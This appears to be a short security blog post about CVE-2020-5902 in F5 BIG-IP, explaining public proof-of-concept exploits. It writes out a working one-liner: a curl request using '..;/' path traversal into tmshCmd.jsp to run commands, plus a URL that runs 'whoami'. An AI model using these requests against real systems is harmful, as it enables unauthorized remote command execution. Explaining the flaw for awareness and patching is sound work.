Sign in Subscribe
vulnerabilities

CVE-2020-5902

DanielxBlack

1 min read

Sadly, this vulnerability doesn't have a cool logo and a theme song. Just some POCs.

Yeah, at this point, we've all heard about CVE-2020-5902 related to F5 Networks' BIG-IP. Which, to my knowledge is a load balancer. It's essentially a proxy that distributes traffic across a number of servers. Cool.

The vulnerability seems pretty easy to exploit based on the proof of concepts I found here and here.

What's that?! No joke? RCE with a one-liner?! Bruh!

That's it?

Again, taking a look: curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>

Looks like the python script here essentially does the same thing. It starts by importing the requests library (and a few others like sys and json):

import requests
import sys
import json
import argparse

Then has you throw a url at it.

The URL arg accepts an input like the following: -u https://<domain/IP> and then it specifies a path based on the option (-o) you select. If looking to test for RCE, it runs a "list auth user admin" command, which as I understand it, lists all users and the admin user. It does that by appending: /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin to the path.

So, check it: https://the.ip.goes.here/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami would run the whoami command. That's if the system is vulnerable. Pretty simple, actually.

That's some easy pwns if you don't fix yo crap.

Sign up for more like this.

Enter your email
Subscribe